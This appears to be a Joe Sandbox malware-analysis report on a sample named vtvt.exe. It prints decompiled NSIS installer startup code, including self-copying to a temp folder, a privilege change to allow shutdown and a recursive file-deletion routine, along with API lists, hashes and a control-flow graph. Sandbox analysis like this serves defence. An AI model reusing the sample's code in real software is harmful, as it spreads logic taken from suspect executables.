                                                                                    				_t232 = L"\"C:\\Users\\jones\\AppData\\Roaming\\vtvt.exe\" ";
                                                                                    				E00406668(_t232, _t92);
                                                                                    				_t94 = _t232;
                                                                                    				_t233 = 0x22;
                                                                                    				 *0x42a260 = 0x400000;
                                                                                    				_t250 = L"\"C:\\Users\\jones\\AppData\\Roaming\\vtvt.exe\" " - _t233; // 0x22
                                                                                    				if(_t250 == 0) {
                                                                                    					_t216 = _t233;
                                                                                    					_t94 =  &M00435002;
                                                                                    				}
                                                                                    				_t198 = CharNextW(E00405F64(_t94, _t216));
                                                                                    				_v16 = _t198;
                                                                                    				while(1) {
                                                                                    					_t97 =  *_t198;
                                                                                    					_t251 = _t97 - _t188;
                                                                                    					if(_t97 == _t188) {
                                                                                    						break;
                                                                                    					}
                                                                                    					_t209 = 0x20;
                                                                                    					__eflags = _t97 - _t209;
                                                                                    					if(_t97 != _t209) {
                                                                                    						L17:
                                                                                    						__eflags =  *_t198 - _t233;
                                                                                    						_v12 = _t209;
                                                                                    						if( *_t198 == _t233) {
                                                                                    							_v12 = _t233;
                                                                                    							_t198 = _t198 + 2;
                                                                                    							__eflags = _t198;
                                                                                    						}
                                                                                    						__eflags =  *_t198 - 0x2f;
                                                                                    						if( *_t198 != 0x2f) {
                                                                                    							L32:
                                                                                    							_t198 = E00405F64(_t198, _v12);
                                                                                    							__eflags =  *_t198 - _t233;
                                                                                    							if(__eflags == 0) {
                                                                                    								_t198 = _t198 + 2;
                                                                                    								__eflags = _t198;
                                                                                    							}
                                                                                    							continue;
                                                                                    						} else {
                                                                                    							_t198 = _t198 + 2;
                                                                                    							__eflags =  *_t198 - 0x53;
                                                                                    							if( *_t198 != 0x53) {
                                                                                    								L24:
                                                                                    								asm("cdq");
                                                                                    								asm("cdq");
                                                                                    								_t214 = L"NCRC" & 0x0000ffff;
                                                                                    								asm("cdq");
                                                                                    								_t226 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t214;
                                                                                    								__eflags =  *_t198 - (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214);
                                                                                    								if( *_t198 != (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214)) {
                                                                                    									L29:
                                                                                    									asm("cdq");
                                                                                    									asm("cdq");
                                                                                    									_t209 = L" /D=" & 0x0000ffff;
                                                                                    									asm("cdq");
                                                                                    									_t229 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t209;
                                                                                    									__eflags =  *(_t198 - 4) - (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209);
                                                                                    									if( *(_t198 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209)) {
                                                                                    										L31:
                                                                                    										_t233 = 0x22;
                                                                                    										goto L32;
                                                                                    									}
                                                                                    									__eflags =  *_t198 - _t229;
                                                                                    									if( *_t198 == _t229) {
                                                                                    										 *(_t198 - 4) = _t188;
                                                                                    										__eflags = _t198;
                                                                                    										E00406668(L"C:\\Users\\jones\\AppData\\Local\\Temp", _t198);
                                                                                    										L37:
                                                                                    										_t234 = L"C:\\Users\\jones\\AppData\\Local\\Temp\\";
                                                                                    										GetTempPathW(0x400, _t234);
                                                                                    										_t116 = E0040360F(_t198, _t251);
                                                                                    										_t252 = _t116;
                                                                                    										if(_t116 != 0) {
                                                                                    											L40:
                                                                                    											DeleteFileW(L"1033"); // executed
                                                                                    											_t118 = E004030D0(_t254, _v20); // executed
                                                                                    											_v8 = _t118;
                                                                                    											if(_t118 != _t188) {
                                                                                    												L68:
                                                                                    												ExitProcess(); // executed
                                                                                    												__imp__OleUninitialize(); // executed
                                                                                    												if(_v8 == _t188) {
                                                                                    													if( *0x42a2f4 == _t188) {
                                                                                    														L77:
                                                                                    														_t119 =  *0x42a30c;
                                                                                    														if(_t119 != 0xffffffff) {
                                                                                    															_v24 = _t119;
                                                                                    														}
                                                                                    														ExitProcess(_v24);
                                                                                    													}
                                                                                    													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
                                                                                    														LookupPrivilegeValueW(_t188, L"SeShutdownPrivilege",  &(_v40.Privileges));
                                                                                    														_v40.PrivilegeCount = 1;
                                                                                    														_v28 = 2;
                                                                                    														AdjustTokenPrivileges(_v16, _t188,  &_v40, _t188, _t188, _t188);
                                                                                    													}
                                                                                    													_t123 = E00406A35(4);
                                                                                    													if(_t123 == _t188) {
                                                                                    														L75:
                                                                                    														if(ExitWindowsEx(2, 0x80040002) != 0) {
                                                                                    															goto L77;
                                                                                    														}
                                                                                    														goto L76;
                                                                                    													} else {
                                                                                    														_push(0x80040002);
                                                                                    														_push(0x25);
                                                                                    														_push(_t188);
                                                                                    														_push(_t188);
                                                                                    														_push(_t188);
                                                                                    														if( *_t123() == 0) {
                                                                                    															L76:
                                                                                    															E0040140B(9);
                                                                                    															goto L77;
                                                                                    														}
                                                                                    														goto L75;
                                                                                    													}
                                                                                    												}
                                                                                    												E00405CC8(_v8, 0x200010);
                                                                                    												ExitProcess(2);
                                                                                    											}
                                                                                    											if( *0x42a27c == _t188) {
                                                                                    												L51:
                                                                                    												 *0x42a30c =  *0x42a30c | 0xffffffff;
                                                                                    												_v24 = E00403D17(_t264);
                                                                                    												goto L68;
                                                                                    											}
                                                                                    											_t218 = E00405F64(L"\"C:\\Users\\jones\\AppData\\Roaming\\vtvt.exe\" ", _t188);
                                                                                    											if(_t218 < L"\"C:\\Users\\jones\\AppData\\Roaming\\vtvt.exe\" ") {
                                                                                    												L48:
                                                                                    												_t263 = _t218 - L"\"C:\\Users\\jones\\AppData\\Roaming\\vtvt.exe\" ";
                                                                                    												_v8 = L"Error launching installer";
                                                                                    												if(_t218 < L"\"C:\\Users\\jones\\AppData\\Roaming\\vtvt.exe\" ") {
                                                                                    													_t189 = E00405C33(__eflags);
                                                                                    													lstrcatW(_t234, L"~nsu");
                                                                                    													__eflags = _t189;
                                                                                    													if(_t189 != 0) {
                                                                                    														lstrcatW(_t234, "A");
                                                                                    													}
                                                                                    													lstrcatW(_t234, L".tmp");
                                                                                    													_t137 = lstrcmpiW(_t234, 0x436800);
                                                                                    													__eflags = _t137;
                                                                                    													if(_t137 == 0) {
                                                                                    														L67:
                                                                                    														_t188 = 0;
                                                                                    														__eflags = 0;
                                                                                    														goto L68;
                                                                                    													} else {
                                                                                    														__eflags = _t189;
                                                                                    														_push(_t234);
                                                                                    														if(_t189 == 0) {
                                                                                    															E00405C16();
                                                                                    														} else {
                                                                                    															E00405B99();
                                                                                    														}
                                                                                    														SetCurrentDirectoryW(_t234);
                                                                                    														__eflags = L"C:\\Users\\jones\\AppData\\Local\\Temp"; // 0x43
                                                                                    														if(__eflags == 0) {
                                                                                    															E00406668(L"C:\\Users\\jones\\AppData\\Local\\Temp", 0x436800);
                                                                                    														}
                                                                                    														E00406668(0x42b000, _v16);
                                                                                    														_t201 = "A" & 0x0000ffff;
                                                                                    														_t143 = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
                                                                                    														__eflags = _t143;
                                                                                    														_v12 = 0x1a;
                                                                                    														 *0x42b800 = _t143;
                                                                                    														do {
                                                                                    															E004066A5(0, 0x420f08, _t234, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x120)));
                                                                                    															DeleteFileW(0x420f08);
                                                                                    															__eflags = _v8;
                                                                                    															if(_v8 != 0) {
                                                                                    																_t148 = CopyFileW(L"C:\\Users\\jones\\AppData\\Roaming\\vtvt.exe", 0x420f08, 1);
                                                                                    																__eflags = _t148;
                                                                                    																if(_t148 != 0) {
                                                                                    																	E00406428(_t201, 0x420f08, 0);
                                                                                    																	E004066A5(0, 0x420f08, _t234, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x124)));
                                                                                    																	_t152 = E00405C4B(0x420f08);
                                                                                    																	__eflags = _t152;
                                                                                    																	if(_t152 != 0) {
                                                                                    																		CloseHandle(_t152);
                                                                                    																		_v8 = 0;
                                                                                    																	}
                                                                                    																}
                                                                                    															}
                                                                                    															 *0x42b800 =  *0x42b800 + 1;
                                                                                    															_t61 =  &_v12;
                                                                                    															 *_t61 = _v12 - 1;
                                                                                    															__eflags =  *_t61;
                                                                                    														} while ( *_t61 != 0);
                                                                                    														E00406428(_t201, _t234, 0);
                                                                                    														goto L67;
                                                                                    													}
                                                                                    												}
                                                                                    												 *_t218 = _t188;
                                                                                    												_t221 =  &(_t218[2]);
                                                                                    												_t157 = E0040603F(_t263,  &(_t218[2]));
                                                                                    												_t264 = _t157;
                                                                                    												if(_t157 == 0) {
                                                                                    													goto L68;
                                                                                    												}
                                                                                    												E00406668(L"C:\\Users\\jones\\AppData\\Local\\Temp", _t221);
                                                                                    												E00406668(0x436000, _t221);
                                                                                    												_v8 = _t188;
                                                                                    												goto L51;
                                                                                    											}
                                                                                    											asm("cdq");
                                                                                    											asm("cdq");
                                                                                    											asm("cdq");
                                                                                    											_t204 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
                                                                                    											_t167 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t209 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
                                                                                    											while( *_t218 != _t204 || _t218[1] != _t167) {
                                                                                    												_t218 = _t218;
                                                                                    												if(_t218 >= L"\"C:\\Users\\jones\\AppData\\Roaming\\vtvt.exe\" ") {
                                                                                    													continue;
                                                                                    												}
                                                                                    												break;
                                                                                    											}
                                                                                    											_t188 = 0;
                                                                                    											goto L48;
                                                                                    										}
                                                                                    										GetWindowsDirectoryW(_t234, 0x3fb);
                                                                                    										lstrcatW(_t234, L"\\Temp");
                                                                                    										_t170 = E0040360F(_t198, _t252);
                                                                                    										_t253 = _t170;
                                                                                    										if(_t170 != 0) {
                                                                                    											goto L40;
                                                                                    										}
                                                                                    										GetTempPathW(0x3fc, _t234);
                                                                                    										lstrcatW(_t234, L"Low");
                                                                                    										SetEnvironmentVariableW(L"TEMP", _t234);
                                                                                    										SetEnvironmentVariableW(L"TMP", _t234);
                                                                                    										_t175 = E0040360F(_t198, _t253);
                                                                                    										_t254 = _t175;
                                                                                    										if(_t175 == 0) {
                                                                                    											goto L68;
                                                                                    										}
                                                                                    										goto L40;
                                                                                    									}
                                                                                    									goto L31;
                                                                                    								}
                                                                                    								__eflags =  *((intOrPtr*)(_t198 + 4)) - _t226;
                                                                                    								if( *((intOrPtr*)(_t198 + 4)) != _t226) {
                                                                                    									goto L29;
                                                                                    								}
                                                                                    								_t177 =  *((intOrPtr*)(_t198 + 8));
                                                                                    								__eflags = _t177 - 0x20;
                                                                                    								if(_t177 == 0x20) {
                                                                                    									L28:
                                                                                    									_t36 =  &_v20;
                                                                                    									 *_t36 = _v20 | 0x00000004;
                                                                                    									__eflags =  *_t36;
                                                                                    									goto L29;
                                                                                    								}
                                                                                    								__eflags = _t177 - _t188;
                                                                                    								if(_t177 != _t188) {
                                                                                    									goto L29;
                                                                                    								}
                                                                                    								goto L28;
                                                                                    							}
                                                                                    							_t178 =  *((intOrPtr*)(_t198 + 2));
                                                                                    							__eflags = _t178 - _t209;
                                                                                    							if(_t178 == _t209) {
                                                                                    								L23:
                                                                                    								 *0x42a300 = 1;
                                                                                    								goto L24;
                                                                                    							}
                                                                                    							__eflags = _t178 - _t188;
                                                                                    							if(_t178 != _t188) {
                                                                                    								goto L24;
                                                                                    							}
                                                                                    							goto L23;
                                                                                    						}
                                                                                    					} else {
                                                                                    						goto L16;
                                                                                    					}
                                                                                    					do {
                                                                                    						L16:
                                                                                    						_t198 = _t198 + 2;
                                                                                    						__eflags =  *_t198 - _t209;
                                                                                    					} while ( *_t198 == _t209);
                                                                                    					goto L17;
                                                                                    				}
                                                                                    				goto L37;
                                                                                    			}



















































                                                                                    0x0040364e
                                                                                    0x0040364f
                                                                                    0x00403656
                                                                                    0x00403659
                                                                                    0x00403660
                                                                                    0x00403663
                                                                                    0x00403676
                                                                                    0x0040367c
                                                                                    0x0040367f
                                                                                    0x00403682
                                                                                    0x00403690
                                                                                    0x00403698
                                                                                    0x004036a3
                                                                                    0x004036bc
                                                                                    0x004036be
                                                                                    0x004036c6
                                                                                    0x004036c6
                                                                                    0x004036d1
                                                                                    0x004036d3
                                                                                    0x004036d3
                                                                                    0x004036e8
                                                                                    0x0040370d
                                                                                    0x0040371b
                                                                                    0x0040371e
                                                                                    0x00403725
                                                                                    0x0040372c
                                                                                    0x0040372c
                                                                                    0x00403725
                                                                                    0x0040372e
                                                                                    0x00403733
                                                                                    0x00403734
                                                                                    0x00403740
                                                                                    0x00403744
                                                                                    0x0040374b
                                                                                    0x00403759
                                                                                    0x0040375e
                                                                                    0x00403765
                                                                                    0x00403769
                                                                                    0x0040376d
                                                                                    0x0040376f
                                                                                    0x0040376f
                                                                                    0x0040376d
                                                                                    0x00403776
                                                                                    0x0040377d
                                                                                    0x00403783
                                                                                    0x0040379b
                                                                                    0x004037ab
                                                                                    0x004037b0
                                                                                    0x004037b6
                                                                                    0x004037bd
                                                                                    0x004037c4
                                                                                    0x004037c6
                                                                                    0x004037c7
                                                                                    0x004037d1
                                                                                    0x004037d8
                                                                                    0x004037da
                                                                                    0x004037dc
                                                                                    0x004037dc
                                                                                    0x004037ef
                                                                                    0x004037f1
                                                                                    0x004038eb
                                                                                    0x004038eb
                                                                                    0x004038ee
                                                                                    0x004038f1
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004037fb
                                                                                    0x004037fc
                                                                                    0x004037ff
                                                                                    0x00403808
                                                                                    0x00403808
                                                                                    0x0040380b
                                                                                    0x0040380e
                                                                                    0x00403811
                                                                                    0x00403814
                                                                                    0x00403814
                                                                                    0x00403814
                                                                                    0x00403815
                                                                                    0x00403819
                                                                                    0x004038d9
                                                                                    0x004038e2
                                                                                    0x004038e4
                                                                                    0x004038e7
                                                                                    0x004038ea
                                                                                    0x004038ea
                                                                                    0x004038ea
                                                                                    0x00000000
                                                                                    0x0040381f
                                                                                    0x00403820
                                                                                    0x00403821
                                                                                    0x00403825
                                                                                    0x0040383f
                                                                                    0x00403846
                                                                                    0x00403859
                                                                                    0x0040385a
                                                                                    0x0040386f
                                                                                    0x00403874
                                                                                    0x00403876
                                                                                    0x00403878
                                                                                    0x00403894
                                                                                    0x0040389b
                                                                                    0x004038ae
                                                                                    0x004038af
                                                                                    0x004038c4
                                                                                    0x004038ca
                                                                                    0x004038cc
                                                                                    0x004038ce
                                                                                    0x004038d6
                                                                                    0x004038d8
                                                                                    0x00000000
                                                                                    0x004038d8
                                                                                    0x004038d2
                                                                                    0x004038d4
                                                                                    0x004038f9
                                                                                    0x004038fd
                                                                                    0x00403906
                                                                                    0x0040390b
                                                                                    0x00403911
                                                                                    0x0040391c
                                                                                    0x0040391e
                                                                                    0x00403923
                                                                                    0x00403925
                                                                                    0x0040397d
                                                                                    0x00403982
                                                                                    0x0040398b
                                                                                    0x00403992
                                                                                    0x00403995
                                                                                    0x00403b6c
                                                                                    0x00403b6c
                                                                                    0x00403b71
                                                                                    0x00403b7a
                                                                                    0x00403b97
                                                                                    0x00403c0f
                                                                                    0x00403c0f
                                                                                    0x00403c17
                                                                                    0x00403c19
                                                                                    0x00403c19
                                                                                    0x00403c1f
                                                                                    0x00403c1f
                                                                                    0x00403bae
                                                                                    0x00403bba
                                                                                    0x00403bcb
                                                                                    0x00403bd2
                                                                                    0x00403bd9
                                                                                    0x00403bd9
                                                                                    0x00403be1
                                                                                    0x00403bed
                                                                                    0x00403bfb
                                                                                    0x00403c06
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403bef
                                                                                    0x00403bef
                                                                                    0x00403bf0
                                                                                    0x00403bf2
                                                                                    0x00403bf3
                                                                                    0x00403bf4
                                                                                    0x00403bf9
                                                                                    0x00403c08
                                                                                    0x00403c0a
                                                                                    0x00000000
                                                                                    0x00403c0a
                                                                                    0x00000000
                                                                                    0x00403bf9
                                                                                    0x00403bed
                                                                                    0x00403b84
                                                                                    0x00403b8b
                                                                                    0x00403b8b
                                                                                    0x004039a1
                                                                                    0x00403a48
                                                                                    0x00403a48
                                                                                    0x00403a54
                                                                                    0x00000000
                                                                                    0x00403a54
                                                                                    0x004039b2
                                                                                    0x004039ba
                                                                                    0x00403a0c
                                                                                    0x00403a0c
                                                                                    0x00403a12
                                                                                    0x00403a19
                                                                                    0x00403a67
                                                                                    0x00403a69
                                                                                    0x00403a6e
                                                                                    0x00403a70
                                                                                    0x00403a78
                                                                                    0x00403a78
                                                                                    0x00403a83
                                                                                    0x00403a8f
                                                                                    0x00403a95
                                                                                    0x00403a97
                                                                                    0x00403b6a
                                                                                    0x00403b6a
                                                                                    0x00403b6a
                                                                                    0x00000000
                                                                                    0x00403a9d
                                                                                    0x00403a9d
                                                                                    0x00403a9f
                                                                                    0x00403aa0
                                                                                    0x00403aa9
                                                                                    0x00403aa2
                                                                                    0x00403aa2
                                                                                    0x00403aa2
                                                                                    0x00403aaf
                                                                                    0x00403ab7
                                                                                    0x00403abe
                                                                                    0x00403ac6
                                                                                    0x00403ac6
                                                                                    0x00403ad3
                                                                                    0x00403adf
                                                                                    0x00403ae9
                                                                                    0x00403ae9
                                                                                    0x00403aeb
                                                                                    0x00403af2
                                                                                    0x00403afc
                                                                                    0x00403b08
                                                                                    0x00403b0e
                                                                                    0x00403b14
                                                                                    0x00403b17
                                                                                    0x00403b21
                                                                                    0x00403b27
                                                                                    0x00403b29
                                                                                    0x00403b2d
                                                                                    0x00403b3e
                                                                                    0x00403b44
                                                                                    0x00403b49
                                                                                    0x00403b4b
                                                                                    0x00403b4e
                                                                                    0x00403b54
                                                                                    0x00403b54
                                                                                    0x00403b4b
                                                                                    0x00403b29
                                                                                    0x00403b57
                                                                                    0x00403b5e
                                                                                    0x00403b5e
                                                                                    0x00403b5e
                                                                                    0x00403b5e
                                                                                    0x00403b65
                                                                                    0x00000000
                                                                                    0x00403b65
                                                                                    0x00403a97
                                                                                    0x00403a1b
                                                                                    0x00403a1e
                                                                                    0x00403a22
                                                                                    0x00403a27
                                                                                    0x00403a29
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403a35
                                                                                    0x00403a40
                                                                                    0x00403a45
                                                                                    0x00000000
                                                                                    0x00403a45
                                                                                    0x004039c3
                                                                                    0x004039db
                                                                                    0x004039ec
                                                                                    0x004039ed
                                                                                    0x004039f1
                                                                                    0x004039f3
                                                                                    0x00403a01
                                                                                    0x00403a08
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403a08
                                                                                    0x00403a0a
                                                                                    0x00000000
                                                                                    0x00403a0a
                                                                                    0x0040392d
                                                                                    0x00403939
                                                                                    0x0040393e
                                                                                    0x00403943
                                                                                    0x00403945
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040394d
                                                                                    0x00403955
                                                                                    0x00403966
                                                                                    0x0040396e
                                                                                    0x00403970
                                                                                    0x00403975
                                                                                    0x00403977
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403977
                                                                                    0x00000000
                                                                                    0x004038d4
                                                                                    0x0040387d
                                                                                    0x0040387f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403881
                                                                                    0x00403885
                                                                                    0x00403889
                                                                                    0x00403890
                                                                                    0x00403890
                                                                                    0x00403890
                                                                                    0x00403890
                                                                                    0x00000000
                                                                                    0x00403890
                                                                                    0x0040388b
                                                                                    0x0040388e
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040388e
                                                                                    0x00403827
                                                                                    0x0040382b
                                                                                    0x0040382e
                                                                                    0x00403835
                                                                                    0x00403835
                                                                                    0x00000000
                                                                                    0x00403835
                                                                                    0x00403830
                                                                                    0x00403833
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403833
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403801
                                                                                    0x00403801
                                                                                    0x00403802
                                                                                    0x00403803
                                                                                    0x00403803
                                                                                    0x00000000
                                                                                    0x00403801
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • SetErrorMode.KERNELBASE(00008001), ref: 00403663
                                                                                    • GetVersionExW.KERNEL32(?), ref: 0040368C
                                                                                    • GetVersionExW.KERNEL32(0000011C), ref: 004036A3
                                                                                    • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040373A
                                                                                    • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403776
                                                                                    • OleInitialize.OLE32(00000000), ref: 0040377D
                                                                                    • SHGetFileInfoW.SHELL32(00421708,00000000,?,000002B4,00000000), ref: 0040379B
                                                                                    • GetCommandLineW.KERNEL32(00429260,NSIS Error), ref: 004037B0
                                                                                    • CharNextW.USER32(00000000,"C:\Users\user\AppData\Roaming\vtvt.exe" ,00000020,"C:\Users\user\AppData\Roaming\vtvt.exe" ,00000000), ref: 004037E9
                                                                                    • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 0040391C
                                                                                    • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040392D
                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403939
                                                                                    • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040394D
                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403955
                                                                                    • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403966
                                                                                    • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040396E
                                                                                    • DeleteFileW.KERNELBASE(1033), ref: 00403982
                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403A69
                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328), ref: 00403A78
                                                                                      • Part of subcall function 00405C16: CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403A83
                                                                                    • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00436800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\AppData\Roaming\vtvt.exe" ,00000000,?), ref: 00403A8F
                                                                                    • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403AAF
                                                                                    • DeleteFileW.KERNEL32(00420F08,00420F08,?,0042B000,?), ref: 00403B0E
                                                                                    • CopyFileW.KERNEL32(C:\Users\user\AppData\Roaming\vtvt.exe,00420F08,00000001), ref: 00403B21
                                                                                    • CloseHandle.KERNEL32(00000000,00420F08,00420F08,?,00420F08,00000000), ref: 00403B4E
                                                                                    • ExitProcess.KERNEL32(?), ref: 00403B6C
                                                                                    • OleUninitialize.OLE32(?), ref: 00403B71
                                                                                    • ExitProcess.KERNEL32 ref: 00403B8B
                                                                                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403B9F
                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00403BA6
                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BBA
                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403BD9
                                                                                    • ExitWindowsEx.USER32(00000002,80040002), ref: 00403BFE
                                                                                    • ExitProcess.KERNEL32 ref: 00403C1F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.337422665.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.337413138.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337431193.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000437000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337487256.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_vtvt.jbxd
                                                                                    Similarity
                                                                                    • API ID: Processlstrcat$ExitFile$Directory$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                                                    • String ID: "C:\Users\user\AppData\Roaming\vtvt.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\vtvt.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                    • API String ID: 2292928366-2494216570
                                                                                    • Opcode ID: 576690ede7b5918326371ee6a86c03391da91488ae6859ca98bd2718df8a95ef
                                                                                    • Instruction ID: d56582c8b11bee4b9d4e83ad1f604629a9588d533935b381636b20c84fba3529
                                                                                    • Opcode Fuzzy Hash: 576690ede7b5918326371ee6a86c03391da91488ae6859ca98bd2718df8a95ef
                                                                                    • Instruction Fuzzy Hash: D4E1F471A00214AADB20AFB58D45A6E3EB8EB05709F50847FF945B32D1DB7C8A41CB6D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 395 405d74-405d9a call 40603f 398 405db3-405dba 395->398 399 405d9c-405dae DeleteFileW 395->399 401 405dbc-405dbe 398->401 402 405dcd-405ddd call 406668 398->402 400 405f30-405f34 399->400 403 405dc4-405dc7 401->403 404 405ede-405ee3 401->404 410 405dec-405ded call 405f83 402->410 411 405ddf-405dea lstrcatW 402->411 403->402 403->404 404->400 406 405ee5-405ee8 404->406 408 405ef2-405efa call 40699e 406->408 409 405eea-405ef0 406->409 408->400 419 405efc-405f10 call 405f37 call 405d2c 408->419 409->400 414 405df2-405df6 410->414 411->414 415 405e02-405e08 lstrcatW 414->415 416 405df8-405e00 414->416 418 405e0d-405e29 lstrlenW FindFirstFileW 415->418 416->415 416->418 420 405ed3-405ed7 418->420 421 405e2f-405e37 418->421 435 405f12-405f15 419->435 436 405f28-405f2b call 4056ca 419->436 420->404 426 405ed9 420->426 423 405e57-405e6b call 406668 421->423 424 405e39-405e41 421->424 437 405e82-405e8d call 405d2c 423->437 438 405e6d-405e75 423->438 427 405e43-405e4b 424->427 428 405eb6-405ec6 FindNextFileW 424->428 426->404 427->423 431 405e4d-405e55 427->431 428->421 434 405ecc-405ecd FindClose 428->434 431->423 431->428 434->420 435->409 441 405f17-405f26 call 4056ca call 406428 435->441 436->400 446 405eae-405eb1 call 4056ca 437->446 447 405e8f-405e92 437->447 438->428 442 405e77-405e80 call 405d74 438->442 441->400 442->428 446->428 450 405e94-405ea4 call 4056ca call 406428 447->450 451 405ea6-405eac 447->451 450->428 451->428
                                                                                    C-Code - Quality: 98%
                                                                                    			E00405D74(void* __eflags, signed int _a4, signed int _a8) {
                                                                                    				signed int _v8;
                                                                                    				signed int _v12;
                                                                                    				short _v556;
                                                                                    				short _v558;
                                                                                    				struct _WIN32_FIND_DATAW _v604;
                                                                                    				signed int _t38;
                                                                                    				signed int _t52;
                                                                                    				signed int _t55;
                                                                                    				signed int _t62;
                                                                                    				void* _t64;
                                                                                    				signed char _t65;
                                                                                    				WCHAR* _t66;
                                                                                    				void* _t67;
                                                                                    				WCHAR* _t68;
                                                                                    				void* _t70;
                                                                                    
                                                                                    				_t65 = _a8;
                                                                                    				_t68 = _a4;
                                                                                    				_v8 = _t65 & 0x00000004;
                                                                                    				_t38 = E0040603F(__eflags, _t68);
                                                                                    				_v12 = _t38;
                                                                                    				if((_t65 & 0x00000008) != 0) {
                                                                                    					_t62 = DeleteFileW(_t68); // executed
                                                                                    					asm("sbb eax, eax");
                                                                                    					_t64 =  ~_t62 + 1;
                                                                                    					 *0x42a2e8 =  *0x42a2e8 + _t64;
                                                                                    					return _t64;
                                                                                    				}
                                                                                    				_a4 = _t65;
                                                                                    				_t8 =  &_a4;
                                                                                    				 *_t8 = _a4 & 0x00000001;
                                                                                    				__eflags =  *_t8;
                                                                                    				if( *_t8 == 0) {
                                                                                    					L5:
                                                                                    					E00406668(0x425750, _t68);
